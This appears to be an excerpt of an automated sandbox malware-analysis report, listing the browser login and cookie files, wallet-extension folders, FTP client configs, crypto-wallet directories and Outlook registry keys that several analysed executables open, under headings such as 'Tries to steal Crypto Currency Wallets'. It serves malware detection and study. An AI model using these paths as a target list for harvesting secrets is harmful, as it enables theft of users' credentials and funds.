                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Tries to harvest and steal ftp login credentials
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                              Tries to steal Crypto Currency Wallets
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Tries to steal Mail credentials (via file / registry access)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
